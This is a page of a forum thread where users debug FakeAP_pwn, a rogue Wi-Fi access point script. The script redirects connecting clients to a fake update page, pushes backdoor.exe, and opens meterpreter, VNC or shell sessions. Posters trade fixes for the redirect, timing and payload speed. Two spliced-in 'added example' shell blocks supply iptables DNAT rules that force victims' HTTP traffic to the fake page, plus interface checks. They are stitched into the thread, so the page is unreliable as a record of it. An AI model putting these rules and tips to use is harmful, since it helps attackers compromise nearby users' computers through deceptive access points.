Page 9 of 19 FirstFirst ... 7891011 ... LastLast
Results 81 to 90 of 185

Thread: [Script] [Video] FakeAP_pwn (v0.2.1)

  1. #81
    Just burned his ISO
    Join Date
    Jul 2010
    Posts
    5

    Default Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    W000t! Finally got this damn thing figured out.. working on both my XP and my Win7 x64 machines. The problem with the redirect is that the script is telling iptables to redirect port 80-->10000 for sslstrip, and also to redirect port 80-->10.0.0.1, which obviously won't work. So, if you want the redirect to work, just # out line 547 (iptables -t nat -A PREROUTING... --to-port 10000)

    Let me know if this works for any of you guys-
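What teaker describes above is a first-match problem in the nat PREROUTING chain: the first rule that matches tcp/80 wins, so a REDIRECT to sslstrip placed ahead of a DNAT to the fake update page sends clients to sslstrip (and from there to the real site) and they never see the page. The block below is an added example written for this edit, not code from fakeAP_pwn or from the poster: it emits a ruleset that contains only one tcp/80 rule, and a check that flags a chain where the same destination port is matched twice. The interface at0, the AP address 10.0.0.1, the sslstrip port 10000 and the upstream eth0 are taken from the thread; IPT defaulting to a dry run (echo) is an assumption of this example.

```shell
#!/bin/sh
# Added example (not fakeAP_pwn's own code): show why two nat PREROUTING
# rules for tcp/80 conflict, and check a ruleset for that conflict.
# Assumptions: fake AP interface at0, attacker web server on 10.0.0.1:80,
# sslstrip on port 10000, upstream eth0 (all from the thread). IPT defaults
# to a dry run so the rules are printed, not applied; set IPT=iptables as root.

: "${IPT:=echo iptables}"

# Emit the nat rules for one of two modes. In the nat PREROUTING chain the
# first matching rule wins, so only ONE tcp/80 rule is ever emitted: either
# the DNAT to the fake update page, or the REDIRECT to a local sslstrip.
fakeap_nat_rules() {
    iface=$1; ap_ip=$2; mode=$3
    $IPT -t nat -F PREROUTING
    case $mode in
        update)   # force every HTTP request to the fake update page
            $IPT -t nat -A PREROUTING -i "$iface" -p tcp --dport 80 \
                -j DNAT --to-destination "${ap_ip}:80" ;;
        sslstrip) # hand HTTP to a local sslstrip listener instead
            $IPT -t nat -A PREROUTING -i "$iface" -p tcp --dport 80 \
                -j REDIRECT --to-ports 10000 ;;
        *) echo "unknown mode: $mode" >&2; return 1 ;;
    esac
    # everything else leaving the fake AP is masqueraded out eth0
    $IPT -t nat -A POSTROUTING -o eth0 -j MASQUERADE
}

# Read `iptables -t nat -S PREROUTING` output (or the dry-run transcript
# above) on stdin and print each destination port matched by more than
# one PREROUTING rule; empty output means no conflict.
find_dport_conflicts() {
    sed -nE 's/.*-A PREROUTING .*--dport ([0-9]+).*/\1/p' | sort | uniq -d
}

# Usage (dry run): fakeap_nat_rules at0 10.0.0.1 update | find_dport_conflicts
```

Run the check against the live chain with `iptables -t nat -S PREROUTING | find_dport_conflicts` before starting the fake AP; if it prints 80, a sslstrip redirect and the update-page DNAT are both present and whichever comes first wins. IP forwarding still has to be enabled separately for the MASQUERADE rule to carry client traffic out eth0.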

  2. #82
    Moderator g0tmi1k
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    Quote Originally Posted by teaker View Post
    Just downloaded r10.
    I've had trouble connecting/obtaining an IP address with each release until I change:
    airbase-ng -P -C 0 <--- to a higher number (ie. 50 or 100). After that I am connecting fine.

    However, once I am connected, metasploit isn't doing anything. In other words, I can connect and surf the internet, but I am never redirected/exploited. Any ideas?
    The -C is only used when you enable "respond2All", which by default it doesn't! So I dunno why that is the case for you!

    Metasploit isn't meant to do anything then anyway!
    DNSSpoof on the other hand...is meant to do something - redirect all the traffic!
    Not sure why it's not doing it - I need to be at home in my lab to test it all out (been coding it without testing it)


    Quote Originally Posted by slowz3r View Post
    Frustrated with this whole it not redirecting thing :P haha oh well

    How long is it taking some of you for VNC to upload to the target? Even after changing the MTU value it seems like it isn't uploading at all,
    You're not the only one frustrated, I've been away travelling and I left my WiFi cards at home! )= So I've been trusting other people to test stuff out (as I don't have my lab)...
    I don't think I'm going to release another update for a bit now. I wanna get home and sort it all out. (=

    Could you tell me:

    • Your WiFi card + driver
    • Your kernel version
    • Signal strength of the AP
    • The time it takes to ping the AP
    • The time it takes to ping google.com when connected to the fakeAP
    • send me the output of: bash fakeAP_pwn.sh -V > output.txt
    Last edited by g0tmi1k; 07-08-2010 at 07:20 AM.
    Have you...g0tmi1k?

  3. #83
    Member
    Join Date
    Mar 2010
    Location
    Somewhere in CA
    Posts
    98

    Default Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    Quote Originally Posted by teaker View Post
    W000t! Finally got this damn thing figured out.. working on both my XP and my Win7 x64 machines. The problem with the redirect is that the script is telling iptables to redirect port 80-->10000 for sslstrip, and also to redirect port 80-->10.0.0.1, which obviously won't work. So, if you want the redirect to work, just # out line 547 (iptables -t nat -A PREROUTING... --to-port 10000)

    Let me know if this works for any of you guys-
    This guy Wins!, successful Redirect!

    Quote Originally Posted by g0tmi1k
    You're not the only one frustrated, I've been away travelling and I left my WiFi cards at home! )= So I've been trusting other people to test stuff out (as I don't have my lab)...
    I don't think I'm going to release another update for a bit now. I wanna get home and sort it all out. (=

    Could you tell me:

    * Your WiFi card + driver
    * Your kernel version
    * Signal strength of the AP
    * The time it takes to ping the AP
    * The time it takes to ping google.com when connected to the fakeAP
    * send me the output of: bash fakeAP_pwn.sh -V > output.txt

    Card+Driver: Linksys WUSB54G v.4, rtl2570
    Kernel: 2.6.34
    Signal Strength: 100%
    Ping AP: 7ms
    Ping google: 100ms
    Output: Pastebin

    Extremely slow. MTU is at 1800, and it really shows when it's uploading the payload to the target; I have yet to get a VNC connection or a shell. But we seem to be getting closer, but speed is an issue
    Last edited by slowz3r; 07-08-2010 at 08:08 AM.

  4. #84
    Senior Member
    Join Date
    Jun 2007
    Location
    UK
    Posts
    175

    Default Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    RC10 progress report
    When running script as is
    client connects OK - browser has internet connection - does not get our update page - enter 10.0.0.1 and update page OK
    Run the download & VNC works (very slow) - meterpreter session opens.

    Re-Run the script
    transparent=false - payload=sbd -mtu=1800
    browser now shows the update page - downloads update & it runs (very slow client would not wait this long if live)
    Gets meterpreter session & shell OK

    It's getting there now, just the problem that the client gets the internet before our update page and is not forced to download first.
    The speed problem did not seem this bad in version 2 and I am running exactly the same test lab, if that gives you a clue.
    many thanks

    Just spotted the post by teaker "# out line 547 (iptables -t nat -A PREROUTING... --to-port 10000)"
    This works, sorry did not spot it earlier. Now gives update page first then internet after running download - Great
    Last edited by parrotface; 07-08-2010 at 08:17 AM. Reason: found earlier post by teaker

  5. #85
    Member
    Join Date
    Mar 2010
    Location
    Somewhere in CA
    Posts
    98

    Default Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    Quote Originally Posted by parrotface View Post
    RC10 progress report
    When running script as is
    client connects OK - browser has internet connection - does not get our update page - enter 10.0.0.1 and update page OK
    Run the download & VNC works (very slow) - meterpreter session opens.

    Re-Run the script
    transparent=false - payload=sbd -mtu=1800
    browser now shows the update page - downloads update & it runs (very slow client would not wait this long if live)
    Gets meterpreter session & shell OK

    It's getting there now, just the problem that the client gets the internet before our update page and is not forced to download first.
    The speed problem did not seem this bad in version 2 and I am running exactly the same test lab, if that gives you a clue.
    many thanks
    How long does it take for the payload to upload and for a VNC session or a shell to spawn?

    longest I've waited for it to upload backdoor.exe was around 4-5 minutes, after that I exit
    Last edited by slowz3r; 07-08-2010 at 08:19 AM.

  6. #86
    Junior Member
    Join Date
    Jan 2010
    Posts
    36

    Default Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    Awesome script

    Few quick things i noticed ..

    line 251, the sleep timer needs to be increased just a tad, mine kept failing out at 5 seconds so I changed it to 10. That could be because I'm in a VM though.

    line 261, you might want to change to macchanger -A, as I noticed that a totally random MAC would fail sometimes when boxes tried to connect


    The last thing really can't be fixed here but it's totally worth noting. airbase-ng has "at least in my opinion" horrible beacons, meaning any Windows 7 box cannot connect to your fakeAP. It also tends to spew out a TON of beacons with a null SSID, so for instance if you look in Windows zeroconf "or whatever the hell they call it" you'll always see an "Other Network".

    I was kicking around a way to solve this last night and one of the ideas that I came up with was using a combo of aireplay-ng and packetforge-ng to grep out a beacon from a pcap "or you could make your own", then having an option in airbase-ng to replay your custom beacon.

    Anyways great script and thanks again

  7. #87
    Moderator g0tmi1k
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    Quote Originally Posted by teaker View Post
    W000t! Finally got this damn thing figured out.. working on both my XP and my Win7 x64 machines. The problem with the redirect is that the script is telling iptables to redirect port 80-->10000 for sslstrip, and also to redirect port 80-->10.0.0.1, which obviously won't work. So, if you want the redirect to work, just # out line 547 (iptables -t nat -A PREROUTING... --to-port 10000)

    Let me know if this works for any of you guys-
    You posted this as I was typing my reply... =P
    Thanks for the fix!
    I'll edit it for the next release (also got the self updater working too!)
    and look into getting SSLStrip to work as well as dnsspoof...

    Quote Originally Posted by slowz3r View Post
    This guy Wins!, successful Redirect!

    Card+Driver: Linksys WUSB54G v.4, rtl2570
    Kernel: 2.6.34
    Signal Strength: 100%
    Ping AP: 7ms
    Ping google: 100ms
    Output: Pastebin

    Extremely slow. MTU is at 1800, and it really shows when it's uploading the payload to the target; I have yet to get a VNC connection or a shell. But we seem to be getting closer, but speed is an issue
    Glad to know it works for someone else!
    Thanks for the info too! (=

    Quote Originally Posted by parrotface View Post
    RC10 progress report
    When running script as is
    client connects OK - browser has internet connection - does not get our update page - enter 10.0.0.1 and update page OK
    Run the download & VNC works (very slow) - meterpreter session opens.

    Re-Run the script
    transparent=false - payload=sbd -mtu=1800
    browser now shows the update page - downloads update & it runs (very slow client would not wait this long if live)
    Gets meterpreter session & shell OK

    It's getting there now, just the problem that the client gets the internet before our update page and is not forced to download first.
    The speed problem did not seem this bad in version 2 and I am running exactly the same test lab, if that gives you a clue.
    many thanks

    Just spotted the post by teaker "# out line 547 (iptables -t nat -A PREROUTING... --to-port 10000)"
    This works, sorry did not spot it earlier. Now gives update page first then internet after running download - Great
    Glad that its now working for you!
    Just gotta get the speed up for you...

    Could you also tell me:
    * Your WiFi card + driver
    * Your kernel version
    * Signal strength of the AP
    * The time it takes to ping the AP
    * The time it takes to ping google.com when connected to the fakeAP
    * send me the output of: bash fakeAP_pwn.sh -V > output.txt



    Quote Originally Posted by slowz3r View Post
    How long does it take for the payload to upload and for a VNC session or a shell to spawn?

    longest I've waited for it to upload backdoor.exe was around 4-5 minutes, after that I exit
    It should be less than 20 seconds - and that's on a bad day!
    *saying that - it depends on the signal strength*
    I'm not 100% sure why it's so slow - but I've got a couple of ideas to try (I'll let you know!)
    Have you...g0tmi1k?

  8. #88
    Senior Member
    Join Date
    Jun 2007
    Location
    UK
    Posts
    175

    Default Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    Quote Originally Posted by slowz3r View Post
    How long does it take for the payload to upload and for a VNC session or a shell to spawn?

    longest I've waited for it to upload backdoor.exe was around 4-5 minutes, after that I exit
    Mine takes about 2 mins, not actually timed it.

    Further testing has shown another problem which I have had previously.
    If I start my attack machine without eth0 connected to my network it fails because eth0 does not have an IP address.
    Now before running the script "ifconfig eth0 192.168.3.101 netmask 255.255.255.0 broadcast 192.168.3.255" the script now runs.
    I guess this is a fairly simple fix with an if statement: no IP then ifconfig etc etc.
    After downloading and running the update mine took approx 90 seconds to get a meterpreter>

  9. #89
    Senior Member
    Join Date
    Jun 2007
    Location
    UK
    Posts
    175

    Default Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    Quote Originally Posted by g0tmi1k View Post


    Glad to know it works for someone else!
    Thanks for the info too! (=


    Glad that its now working for you!
    Just gotta get the speed up for you...

    Could you also tell me:
    * Your WiFi card + driver
    * Your kernel version
    * Signal strength of the AP
    * The time it takes to ping the AP
    * The time it takes to ping google.com when connected to the fakeAP
    * send me the output of: bash fakeAP_pwn.sh -V > output.txt
    WiFi card = Atheros built into eeepc - driver ath5k
    client XP SP2 HP laptop shows max signal strength
    kernel version 2.6.30.9
    ping 10.0.0.1 17ms, 7ms, 18ms, 3ms, average 11ms; re-pings average 38ms, 28ms, 3ms
    ping google.co.uk 83, 47, 50, 63 average 60ms; re-ping average 81, 94, 59ms
    How do I bash fakeAP_pwn.sh -V > output.txt? I ran bash fakeAP_pwn.sh -V > output.txt, something happened when the script ran but I can't find any file output.txt
    thanks
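Two of the problems in the last two posts, eth0 with no IPv4 address and a `-V > output.txt` run that leaves no file to find, are both pre-flight matters. The block below is an added example written for this edit, not part of fakeAP_pwn: it checks an interface for an IPv4 address and assigns one only when it is missing (the if statement parrotface suggests), and captures both stdout and stderr of a verbose run into a file at an absolute path. The interface eth0 and the address 192.168.3.101/24 come from parrotface's post; preferring the `ip` command with net-tools `ifconfig` as a fallback, and the script path, are assumptions of this example.

```shell
#!/bin/sh
# Added example, not fakeAP_pwn's own code: pre-flight checks for a wired
# interface with no IPv4 address, and for capturing a verbose run in full.
# Assumptions: eth0 and 192.168.3.101/24 from the post (a free lab address);
# iproute2 `ip` is preferred, net-tools `ifconfig` is the fallback.

# Print the first IPv4 address found in `ip -4 addr show dev IFACE` or
# `ifconfig IFACE` text read from stdin; prints nothing if there is none.
# Handles both "inet 192.168.3.101/24 ..." and "inet addr:192.168.3.101 ...".
ipv4_addr_from_text() {
    sed -nE 's/^[[:space:]]*inet (addr:)?([0-9.]+).*/\2/p' | head -n 1
}

# Current IPv4 address of IFACE, or empty when it has none.
iface_ipv4() {
    if command -v ip >/dev/null 2>&1; then
        ip -4 addr show dev "$1" 2>/dev/null
    else
        ifconfig "$1" 2>/dev/null
    fi | ipv4_addr_from_text
}

# Assign CIDR to IFACE only when it has no address, so a box booted with
# the cable unplugged can still run the script. Needs root to assign.
ensure_iface_ipv4() {
    iface=$1; cidr=$2
    addr=$(iface_ipv4 "$iface")
    if [ -n "$addr" ]; then
        echo "$iface already has $addr"
        return 0
    fi
    echo "$iface has no IPv4 address, assigning $cidr"
    if command -v ip >/dev/null 2>&1; then
        ip link set "$iface" up && ip addr add "$cidr" dev "$iface"
    else
        # net-tools form, as in the post; only a /24 mask is handled here
        ifconfig "$iface" "${cidr%/*}" netmask 255.255.255.0 up
    fi
}

# Run the script's -V mode keeping stdout AND stderr. A bare `> file`
# drops everything the script writes to stderr, and a relative file name
# lands in whatever directory the shell was in, so pass an absolute path.
# Returns the script's own exit status.
collect_verbose_output() {
    script=$1; out=$2
    bash "$script" -V > "$out" 2>&1
}

# Usage:
#   ensure_iface_ipv4 eth0 192.168.3.101/24
#   collect_verbose_output /root/fakeAP_pwn.sh /root/output.txt
```

If `output.txt` still does not appear after a `2>&1` run, look in the directory the shell was in when the command was typed rather than wherever the script left you; an absolute path for the output file removes that ambiguity.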

  10. #90
    Member joker5bb
    Join Date
    Feb 2010
    Posts
    166

    Default Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    it is running slow because of airbase-ng, it's just broken
